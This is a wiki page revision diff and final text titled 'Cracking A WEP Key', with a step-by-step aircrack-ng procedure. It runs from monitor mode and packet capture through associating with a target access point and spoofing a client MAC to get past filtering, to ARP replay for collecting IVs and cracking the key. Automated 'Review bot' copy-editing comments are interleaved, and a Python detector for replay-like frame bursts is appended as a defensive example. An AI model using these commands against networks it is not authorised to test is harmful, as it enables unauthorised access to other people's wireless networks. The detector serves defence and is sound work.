Difference between revisions of "Cracking A WEP Key"
(2 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
− | + | See http://www.aircrack-ng.org/doku.php?id=tutorial | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | *Use kismet to get the channel | + | *Install kismet, kismet-plugins and aircrack-ng packages |
+ | *Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked | ||
These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits | These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits | ||
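Review bot: the new first line is a bare "See http://www.aircrack-ng.org/doku.php?id=tutorial" with no indication of what the linked tutorial covers or how it relates to the steps that follow; a short phrase naming it would help. In the unchanged line at the end of this hunk, "fussy about the hex addresses, include leading zeros" is a comma splice and would read better with a colon.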
Line 15: | Line 11: | ||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
*Start capturing packets: | *Start capturing packets: | ||
− | airodump-ng -w dumpfile - | + | airodump-ng -w dumpfile --channel <channel> mon0 |
− | + | If you don't get enough traffic from the access point on that channel. start a new terminal session: | |
*Associate with the target AP | *Associate with the target AP | ||
− | + | aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0 | |
If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h. | If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h. | ||
*Start replaying packets so that we can collect more packets: | *Start replaying packets so that we can collect more packets: | ||
− | + | aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0 | |
Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers. | Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers. | ||
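Review bot: in the added sentence "If you don't get enough traffic from the access point on that channel. start a new terminal session:" the full stop after "channel" splits one sentence in two and should be a comma. The added commands use the placeholders <channel>, <ESSid> and <BSSid> but keep a literal 00:01:02:03:04:05 for -h, although the following text says that value may need to be substituted; a placeholder there would be consistent.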
Line 31: | Line 27: | ||
*Ctrl-C the dump process and crack the key: | *Ctrl-C the dump process and crack the key: | ||
aircrack-ng dumpfile.ivs | aircrack-ng dumpfile.ivs | ||
+ | |||
+ | [[Category:Networking]] |
Latest revision as of 15:37, 31 December 2019
See http://www.aircrack-ng.org/doku.php?id=tutorial
- Install kismet, kismet-plugins and aircrack-ng packages
- Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked
These tools are fussy about hex addresses: include leading zeros and don't use lower-case hex digits.
- Become root:
su -
- Put NIC into monitor mode:
airmon-ng start wlan0
- Start capturing packets:
airodump-ng -w dumpfile --channel <channel> mon0
If you don't get enough traffic from the access point on that channel, start a new terminal session:
- Associate with the target AP
aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.
- Start replaying packets so that we can collect more packets:
aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
Watch the Data column in the airodump-ng session; we want more than 100,000 unique IV headers.
- Ctrl-C the dump process and crack the key:
aircrack-ng dumpfile.ivs
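
Seen from the access point owner's side, the replay step above shows up as one transmitter sending a sustained burst of identically sized frames. The following is an added example, not part of the original wiki page: a sliding-window detector over frame records. The record layout, the thresholds and the sample frames are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict, deque

# Assumed thresholds (tune per site; not taken from the page).
WINDOW_S = 10.0        # sliding window length in seconds
MIN_FRAMES = 500       # frames from one transmitter within the window
MIN_SAME_SIZE = 0.9    # share of those frames having one identical length

def detect_replay(frames):
    """frames: iterable of (ts, src_mac, bssid, length), sorted by ts.
    Returns {(bssid, src_mac): first_alert_ts} for replay-like bursts."""
    windows = defaultdict(deque)   # key -> deque of (ts, length)
    sizes = defaultdict(Counter)   # key -> Counter of lengths in window
    alerts = {}
    for ts, src, bssid, length in frames:
        key = (bssid.upper(), src.upper())
        win, cnt = windows[key], sizes[key]
        win.append((ts, length))
        cnt[length] += 1
        # Expire frames older than the window.
        while win and ts - win[0][0] > WINDOW_S:
            _, old_len = win.popleft()
            cnt[old_len] -= 1
            if cnt[old_len] == 0:
                del cnt[old_len]
        if key not in alerts and len(win) >= MIN_FRAMES:
            top = cnt.most_common(1)[0][1]
            if top / len(win) >= MIN_SAME_SIZE:
                alerts[key] = ts
    return alerts

def sample_frames():
    """Constructed sample: one normal client, one replay-like transmitter."""
    ap = "AA:BB:CC:00:00:01"
    frames = []
    # Normal client: 200 frames over 60 s, varied sizes.
    for i in range(200):
        frames.append((i * 0.3, "AA:BB:CC:00:00:10", ap, 80 + (i * 37) % 1200))
    # Replay-like: 3000 identical-length frames in 6 s starting at t=20.
    for i in range(3000):
        frames.append((20 + i * 0.002, "00:01:02:03:04:05", ap, 68))
    return sorted(frames)

if __name__ == "__main__":
    for (bssid, src), ts in detect_replay(sample_frames()).items():
        print(f"{ts:.2f}s replay-like burst on {bssid} from {src}")
```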